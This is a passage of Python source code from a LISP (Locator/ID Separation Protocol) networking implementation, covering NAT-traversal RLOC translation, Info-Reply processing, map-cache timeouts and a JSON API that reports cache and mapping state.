return(rloc_entry.translated_port)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_any_translated_rloc
#
# Find a translated RLOC in any lisp_mapping() from the lisp_db_list. We need
# this to store in an RLE for (S,G) Map-Registers when the ETR is behind NAT
# devices.
#
def lisp_get_any_translated_rloc():
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.translated_rloc.is_null()): continue
return(rloc_entry.translated_rloc)
#endfor
#endfor
return(None)
#enddef
#
# lisp_get_all_translated_rlocs
#
# Return an array of each translated RLOC address in string format.
#
def lisp_get_all_translated_rlocs():
rloc_list = []
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
if (rloc_entry.is_rloc_translated() == False): continue
addr = rloc_entry.translated_rloc.print_address_no_iid()
rloc_list.append(addr)
#endfor
#endfor
return(rloc_list)
#enddef
#
# lisp_update_default_routes
#
# We are an ITR and we received a new RTR-list from the Map-Server. Update
# the RLOCs of the default map-cache entries if they are different.
#
def lisp_update_default_routes(map_resolver, iid, rtr_list):
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
new_rtr_list = {}
for rloc in rtr_list:
if (rloc == None): continue
addr = rtr_list[rloc]
if (ignore_private and addr.is_private_address()): continue
new_rtr_list[rloc] = addr
#endfor
rtr_list = new_rtr_list
prefix_list = []
for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break
#
# Do unicast routes. We assume unicast and multicast routes are sync'ed
# with the same RLOC-set.
#
prefix = lisp_address(afi, "", 0, iid)
prefix.make_default_route(prefix)
mc = lisp_map_cache.lookup_cache(prefix, True)
if (mc):
if (mc.checkpoint_entry):
lprint("Updating checkpoint entry for {}".format( \
green(mc.print_eid_tuple(), False)))
elif (mc.do_rloc_sets_match(rtr_list.values())):
continue
#endif
mc.delete_cache()
#endif
prefix_list.append([prefix, ""])
#
# Do multicast routes.
#
group = lisp_address(afi, "", 0, iid)
group.make_default_multicast_route(group)
gmc = lisp_map_cache.lookup_cache(group, True)
if (gmc): gmc = gmc.source_cache.lookup_cache(prefix, True)
if (gmc): gmc.delete_cache()
prefix_list.append([prefix, group])
#endfor
if (len(prefix_list) == 0): return
#
# Build RLOC-set.
#
rloc_set = []
for rtr in rtr_list:
rtr_addr = rtr_list[rtr]
rloc_entry = lisp_rloc()
rloc_entry.rloc.copy_address(rtr_addr)
rloc_entry.priority = 254
rloc_entry.mpriority = 255
rloc_entry.rloc_name = "RTR"
rloc_set.append(rloc_entry)
#endfor
for prefix in prefix_list:
mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
mc.mapping_source = map_resolver
mc.map_cache_ttl = LISP_MR_TTL * 60
mc.add_cache()
lprint("Add {} to map-cache with RTR RLOC-set: {}".format( \
green(mc.print_eid_tuple(), False), rtr_list.keys()))
rloc_set = copy.deepcopy(rloc_set)
#endfor
return
#enddef
#
# lisp_process_info_reply
#
# Process received Info-Reply message. Store global RLOC and translated port
# in database-mapping entries if requested.
#
# Returns [global-rloc-address, translated-port-number, new_rtr_set].
#
def lisp_process_info_reply(source, packet, store):
#
# Parse Info-Reply.
#
info = lisp_info()
packet = info.decode(packet)
if (packet == None): return([None, None, False])
info.print_info()
#
# Store RTR list.
#
new_rtr_set = False
for rtr in info.rtr_list:
addr_str = rtr.print_address_no_iid()
if (lisp_rtr_list.has_key(addr_str)):
if (lisp_register_all_rtrs == False): continue
if (lisp_rtr_list[addr_str] != None): continue
#endif
new_rtr_set = True
lisp_rtr_list[addr_str] = rtr
#endfor
#
# If an ITR, install default map-cache entries.
#
if (lisp_i_am_itr and new_rtr_set):
if (lisp_iid_to_interface == {}):
lisp_update_default_routes(source, lisp_default_iid, lisp_rtr_list)
else:
for iid in lisp_iid_to_interface.keys():
lisp_update_default_routes(source, int(iid), lisp_rtr_list)
#endfor
#endif
#endif
#
# Either store in database-mapping entries or return to caller.
#
if (store == False):
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#endif
#
# If no private-etr-rloc was supplied in the Info-Reply, use the global
# RLOC for all private RLOCs in the database-mapping entries.
#
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
rloc = rloc_entry.rloc
interface = rloc_entry.interface
if (interface == None):
if (rloc.is_null()): continue
if (rloc.is_local() == False): continue
if (info.private_etr_rloc.is_null() == False and
rloc.is_exact_match(info.private_etr_rloc) == False):
continue
#endif
elif (info.private_etr_rloc.is_dist_name()):
rloc_name = info.private_etr_rloc.address
if (rloc_name != rloc_entry.rloc_name): continue
#endif
eid_str = green(db.eid.print_prefix(), False)
rloc_str = red(rloc.print_address_no_iid(), False)
rlocs_match = info.global_etr_rloc.is_exact_match(rloc)
if (rloc_entry.translated_port == 0 and rlocs_match):
lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
interface, eid_str))
continue
#endif
#
# Nothing changed?
#
translated = info.global_etr_rloc
stored = rloc_entry.translated_rloc
if (stored.is_exact_match(translated) and
info.etr_port == rloc_entry.translated_port): continue
lprint("Store translation {}:{} for {} ({}), EID-prefix {}". \
format(red(info.global_etr_rloc.print_address_no_iid(), False),
info.etr_port, rloc_str, interface, eid_str))
rloc_entry.store_translated_rloc(info.global_etr_rloc,
info.etr_port)
#endfor
#endfor
return([info.global_etr_rloc, info.etr_port, new_rtr_set])
#enddef
#
# lisp_test_mr
#
# Send Map-Requests for arbitrary EIDs to (1) prime the map-cache and to (2)
# test the RTT of the Map-Resolvers.
#
def lisp_test_mr(lisp_sockets, port):
return
lprint("Test Map-Resolvers")
eid = lisp_address(LISP_AFI_IPV4, "", 0, 0)
eid6 = lisp_address(LISP_AFI_IPV6, "", 0, 0)
#
# Send 10.0.0.1 and 192.168.0.1
#
eid.store_address("10.0.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
eid.store_address("192.168.0.1")
lisp_send_map_request(lisp_sockets, port, None, eid, None)
#
# Send 0100::1 and 8000::1.
#
eid6.store_address("0100::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
eid6.store_address("8000::1")
lisp_send_map_request(lisp_sockets, port, None, eid6, None)
#
# Restart periodic timer.
#
lisp_test_mr_timer = threading.Timer(LISP_TEST_MR_INTERVAL, lisp_test_mr,
[lisp_sockets, port])
lisp_test_mr_timer.start()
return
#enddef
#
# lisp_update_local_rloc
#
# Check if local RLOC has changed and update the lisp_rloc() entry in
# lisp_db(). That is, check whether the private address changed, since this
# ETR could have moved to another NAT or the same NAT device could have
# reassigned a new private address.
#
# This function is also used when the interface address is not private. It
# allows us to change the RLOC when the address changes.
#
def lisp_update_local_rloc(rloc):
if (rloc.interface == None): return
addr = lisp_get_interface_address(rloc.interface)
if (addr == None): return
old = rloc.rloc.print_address_no_iid()
new = addr.print_address_no_iid()
if (old == new): return
lprint("Local interface address changed on {} from {} to {}".format( \
rloc.interface, old, new))
rloc.rloc.copy_address(addr)
lisp_myrlocs[0] = addr
return
#enddef
#
# lisp_update_encap_port
#
# Check to see if the encapsulation port changed for an RLOC for the supplied
# map-cache entry.
#
def lisp_update_encap_port(mc):
for rloc in mc.rloc_set:
nat_info = lisp_get_nat_info(rloc.rloc, rloc.rloc_name)
if (nat_info == None): continue
if (rloc.translated_port == nat_info.port): continue
lprint(("Encap-port changed from {} to {} for RLOC {}, " + \
"EID-prefix {}").format(rloc.translated_port, nat_info.port,
red(rloc.rloc.print_address_no_iid(), False),
green(mc.print_eid_tuple(), False)))
rloc.store_translated_rloc(rloc.rloc, nat_info.port)
#endfor
return
#enddef
#
# lisp_timeout_map_cache_entry
#
# Check if a specific map-cache entry needs to be removed due to timer expiry.
# If entry does not time out, go through RLOC-set to see if the encapsulation
# port needs updating.
#
# If "program-hardware = yes" is configured, then check a platform specific
# flag (an Arista platform specific command).
#
def lisp_timeout_map_cache_entry(mc, delete_list):
if (mc.map_cache_ttl == None):
lisp_update_encap_port(mc)
return([True, delete_list])
#endif
now = lisp_get_timestamp()
#
    # Check the refresh timer. If the entry is still active, Native-Forward
    # entries just return; other entries first check for encap-port changes
    # (the NAT case) and then return.
#
if (mc.last_refresh_time + mc.map_cache_ttl > now):
if (mc.action == LISP_NO_ACTION): lisp_update_encap_port(mc)
return([True, delete_list])
#endif
#
# Do not time out NAT-traversal default entries (0.0.0.0/0 and 0::/0).
#
if (lisp_nat_traversal and mc.eid.address == 0 and mc.eid.mask_len == 0):
return([True, delete_list])
#endif
#
# Timed out.
#
elapsed = lisp_print_elapsed(mc.last_refresh_time)
prefix_str = mc.print_eid_tuple()
lprint("Map-cache entry for EID-prefix {} has {}, had uptime of {}". \
format(green(prefix_str, False), bold("timed out", False), elapsed))
#
# Add to delete-list to remove after this loop.
#
delete_list.append(mc)
return([True, delete_list])
#enddef
#
# lisp_timeout_map_cache_walk
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_timeout_map_cache_walk(mc, parms):
delete_list = parms[0]
checkpoint_list = parms[1]
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()):
status, delete_list = lisp_timeout_map_cache_entry(mc, delete_list)
if (delete_list == [] or mc != delete_list[-1]):
checkpoint_list = lisp_write_checkpoint_entry(checkpoint_list, mc)
#endif
return([status, parms])
#endif
if (mc.source_cache == None): return([True, parms])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
parms = mc.source_cache.walk_cache(lisp_timeout_map_cache_entry, parms)
return([True, parms])
#enddef
#
# lisp_timeout_map_cache
#
# Look at TTL expiration for each map-cache entry.
#
def lisp_timeout_map_cache(lisp_map_cache):
parms = [[], []]
parms = lisp_map_cache.walk_cache(lisp_timeout_map_cache_walk, parms)
#
    # Now remove from the map-cache all the timed out entries on the
    # delete_list[].
#
delete_list = parms[0]
for mc in delete_list: mc.delete_cache()
#
# Write contents of checkpoint_list array to checkpoint file.
#
checkpoint_list = parms[1]
lisp_checkpoint(checkpoint_list)
return
#enddef
#
# lisp_store_nat_info
#
# Store source RLOC and port number of an Info-Request packet sent to port
# 4341 where the packet was translated by a NAT device.
#
# The lisp_nat_state_info{} is a dictionary, keyed by Info-Request hostname,
# of arrays of lisp_nat_info() values. We keep all the current and previous
# NAT state associated with the hostname. This is so we can track how much
# movement is occurring.
#
# Return True if the address and port number changed so the caller can fix up
# RLOCs in map-cache entries.
#
def lisp_store_nat_info(hostname, rloc, port):
addr_str = rloc.print_address_no_iid()
msg = "{} NAT state for {}, RLOC {}, port {}".format("{}",
blue(hostname, False), red(addr_str, False), port)
new_nat_info = lisp_nat_info(addr_str, hostname, port)
if (lisp_nat_state_info.has_key(hostname) == False):
lisp_nat_state_info[hostname] = [new_nat_info]
lprint(msg.format("Store initial"))
return(True)
#endif
#
# The youngest entry is always the first element. So check to see if this
# is a refresh of the youngest (current) entry.
#
nat_info = lisp_nat_state_info[hostname][0]
if (nat_info.address == addr_str and nat_info.port == port):
nat_info.uptime = lisp_get_timestamp()
lprint(msg.format("Refresh existing"))
return(False)
#endif
#
    # The received state does not match the youngest entry. See if it exists
    # as an older entry. If not, we prepend the new state; otherwise, we
    # prepend the new state and remove the old entry from the array.
#
old_entry = None
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str and nat_info.port == port):
old_entry = nat_info
break
#endif
#endfor
if (old_entry == None):
lprint(msg.format("Store new"))
else:
lisp_nat_state_info[hostname].remove(old_entry)
lprint(msg.format("Use previous"))
#endif
existing = lisp_nat_state_info[hostname]
lisp_nat_state_info[hostname] = [new_nat_info] + existing
return(True)
#enddef
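#
# Illustrative layout of lisp_nat_state_info{} (hostname, addresses, and
# ports are hypothetical), youngest entry first:
#
#   lisp_nat_state_info["xtr-site1"] =
#       [lisp_nat_info("128.107.1.1", "xtr-site1", 16003),
#        lisp_nat_info("128.107.2.2", "xtr-site1", 4341)]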
#
# lisp_get_nat_info
#
# Do lookup to get port number to store in map-cache entry as the encapsulation
# port.
#
def lisp_get_nat_info(rloc, hostname):
if (lisp_nat_state_info.has_key(hostname) == False): return(None)
addr_str = rloc.print_address_no_iid()
for nat_info in lisp_nat_state_info[hostname]:
if (nat_info.address == addr_str): return(nat_info)
#endfor
return(None)
#enddef
#
# lisp_build_info_requests
#
# Check database-mappings to see if there are any private local RLOCs. If
# so, get the translated global RLOC by sending an Info-Request to a
# Map-Server.
#
# To support multi-homing, that is more than one "interface = <device>"
# rloc sub-command clause, you need the following default routes in the
# kernel so Info-Requests can be load-split across interfaces:
#
# sudo ip route add default via <next-hop> dev eth0
# sudo ip route append default via <another-or-same-next-hop> dev eth1
#
# By having these default routes, we can get the next-hop address for the
# NAT interface we are sending the 4341 Info-Request on, and install an
# ephemeral static route to force the Info-Request to go out a specific
# interface.
#
def lisp_build_info_requests(lisp_sockets, dest, port):
if (lisp_nat_traversal == False): return
#
# Send Info-Request to each configured Map-Resolver and exit loop.
# If we don't find one, try finding a Map-Server. We may send Info-
# Request to an RTR to open up NAT state.
#
dest_list = []
mr_list = []
if (dest == None):
for mr in lisp_map_resolvers_list.values():
mr_list.append(mr.map_resolver)
        #endfor
dest_list = mr_list
if (dest_list == []):
for ms in lisp_map_servers_list.values():
dest_list.append(ms.map_server)
#endfor
#endif
if (dest_list == []): return
else:
dest_list.append(dest)
#endif
#
# Find the NAT-traversed interfaces.
#
rloc_list = {}
for db in lisp_db_list:
for rloc_entry in db.rloc_set:
lisp_update_local_rloc(rloc_entry)
if (rloc_entry.rloc.is_null()): continue
if (rloc_entry.interface == None): continue
addr = rloc_entry.rloc.print_address_no_iid()
if (addr in rloc_list): continue
rloc_list[addr] = rloc_entry.interface
#endfor
#endfor
if (rloc_list == {}):
lprint('Suppress Info-Request, no "interface = <device>" RLOC ' + \
"found in any database-mappings")
return
#endif
#
    # Send Info-Requests out the NAT-traversed interfaces that have
# addresses assigned on them.
#
for addr in rloc_list:
interface = rloc_list[addr]
a = red(addr, False)
lprint("Build Info-Request for private address {} ({})".format(a,
interface))
device = interface if len(rloc_list) > 1 else None
for dest in dest_list:
lisp_send_info_request(lisp_sockets, dest, port, device)
#endfor
#endfor
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
if (mr_list != []):
for mr in lisp_map_resolvers_list.values():
mr.resolve_dns_name()
#endfor
#endif
return
#enddef
#
# lisp_valid_address_format
#
# Check to see if the string is a valid address. We are validating IPv4, IPv6,
# MAC, geo-prefix, E.164, and distinguished-name formats.
#
def lisp_valid_address_format(kw, value):
if (kw != "address"): return(True)
#
# Check if address is a Distinguished-Name. Must have single quotes.
# Check this first because names could have ".", ":", or "-" in them.
#
if (value[0] == "'" and value[-1] == "'"): return(True)
#
# Do IPv4 test for dotted decimal x.x.x.x.
#
if (value.find(".") != -1):
addr = value.split(".")
if (len(addr) != 4): return(False)
for byte in addr:
if (byte.isdigit() == False): return(False)
if (int(byte) > 255): return(False)
#endfor
return(True)
#endif
#
# Test for a geo-prefix. They have N, S, W, E characters in them.
#
if (value.find("-") != -1):
addr = value.split("-")
for i in ["N", "S", "W", "E"]:
if (i in addr):
if (len(addr) < 8): return(False)
return(True)
#endif
#endfor
#endif
#
# Do MAC test in format xxxx-xxxx-xxxx.
#
if (value.find("-") != -1):
addr = value.split("-")
if (len(addr) != 3): return(False)
for hexgroup in addr:
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do IPv6 test in format aaaa:bbbb::cccc:dddd
#
if (value.find(":") != -1):
addr = value.split(":")
if (len(addr) < 2): return(False)
found_null = False
count = 0
for hexgroup in addr:
count += 1
if (hexgroup == ""):
if (found_null):
if (len(addr) == count): break
if (count > 2): return(False)
#endif
found_null = True
continue
#endif
try: int(hexgroup, 16)
except: return(False)
#endfor
return(True)
#endif
#
# Do E.164 format test. The address is a "+" followed by <= 15 BCD digits.
#
if (value[0] == "+"):
addr = value[1::]
for digit in addr:
if (digit.isdigit() == False): return(False)
#endfor
return(True)
#endif
return(False)
#enddef
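#
# Illustrative strings (values hypothetical) this validator accepts:
# "10.1.1.1" (IPv4), "fd00::1" (IPv6), "0050-b6e0-a1c2" (MAC),
# "37-46-17-N-121-53-30-W" (geo-prefix), "+14085551212" (E.164), and
# "'my-dist-name'" (distinguished-name in single quotes).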
#
# lisp_process_api
#
# Used by all lisp processes (not the lisp-core process) to read data
# structures and return them via IPC to the lisp-core process.
#
# Variable data_structure has following format:
#
# "<data-structure-name>%{<dictionary-array-of-parameters>}"
#
def lisp_process_api(process, lisp_socket, data_structure):
api_name, parms = data_structure.split("%")
lprint("Process API request '{}', parameters: '{}'".format(api_name,
parms))
data = []
if (api_name == "map-cache"):
if (parms == ""):
data = lisp_map_cache.walk_cache(lisp_process_api_map_cache, data)
else:
data = lisp_process_api_map_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache"):
if (parms == ""):
data = lisp_sites_by_eid.walk_cache(lisp_process_api_site_cache,
data)
else:
data = lisp_process_api_site_cache_entry(json.loads(parms))
#endif
#endif
if (api_name == "site-cache-summary"):
data = lisp_process_api_site_cache_summary(lisp_sites_by_eid)
#endif
if (api_name == "map-server"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(True, parms)
#endif
if (api_name == "map-resolver"):
parms = {} if (parms == "") else json.loads(parms)
data = lisp_process_api_ms_or_mr(False, parms)
#endif
if (api_name == "database-mapping"):
data = lisp_process_api_database_mapping()
#endif
#
# Send IPC back to lisp-core process.
#
data = json.dumps(data)
ipc = lisp_api_ipc(process, data)
lisp_ipc(ipc, lisp_socket, "lisp-core")
return
#enddef
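#
# Example (parameter values hypothetical) of a data_structure string, where
# the parameters after the "%" are a JSON dictionary:
#
#   map-cache%{"instance-id": "1000", "eid-prefix": "10.1.0.0/16"}
#
# An empty parameter string, such as "map-cache%", walks the entire cache.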
#
# lisp_process_api_map_cache
#
# Return map-cache to API caller.
#
def lisp_process_api_map_cache(mc, data):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_gather_map_cache_data(mc, data))
if (mc.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = mc.source_cache.walk_cache(lisp_gather_map_cache_data, data)
return([True, data])
#enddef
#
# lisp_gather_map_cache_data
#
# Return map-cache to API caller.
#
def lisp_gather_map_cache_data(mc, data):
entry = {}
entry["instance-id"] = str(mc.eid.instance_id)
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
if (mc.group.is_null() == False):
entry["group-prefix"] = mc.group.print_prefix_no_iid()
#endif
entry["uptime"] = lisp_print_elapsed(mc.uptime)
entry["expires"] = lisp_print_elapsed(mc.uptime)
entry["action"] = lisp_map_reply_action_string[mc.action]
entry["ttl"] = "--" if mc.map_cache_ttl == None else \
str(mc.map_cache_ttl / 60)
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in mc.rloc_set:
r = lisp_fill_rloc_in_json(rloc)
#
# If this is a multicast RLOC, then add the array for member RLOCs
# that may have responded to a multicast RLOC-probe.
#
if (rloc.rloc.is_multicast_address()):
r["multicast-rloc-set"] = []
for mrloc in rloc.multicast_rloc_probe_list.values():
mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in site_cache.cache[ml].entries.values():
if (se.accept_more_specifics == False): continue
if (sites.has_key(se.site.site_name) == False):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-server or map-resolver configuration to the API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of configured database-mappings, including dynamic data like
# the translated_rloc.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
    # return the instance-ID configured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
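#
# Illustrative example (configuration hypothetical): if device eth0 carries
# multi-tenant EID-prefixes [1000]10.1.0.0/16 and [2000]10.1.1.0/24 on two
# "lisp interface" entries, a source-EID of 10.1.1.5 matches both but the
# /24 entry is the longest match, so the instance-ID configured on that
# interface is returned.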
#
# lisp_allow_dynamic_eid
#
# Returns the dynamic-eid-device (or device if "dynamic-eid-device" is not
# configured) if the supplied EID matches a configured dynamic-EID in a
# "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
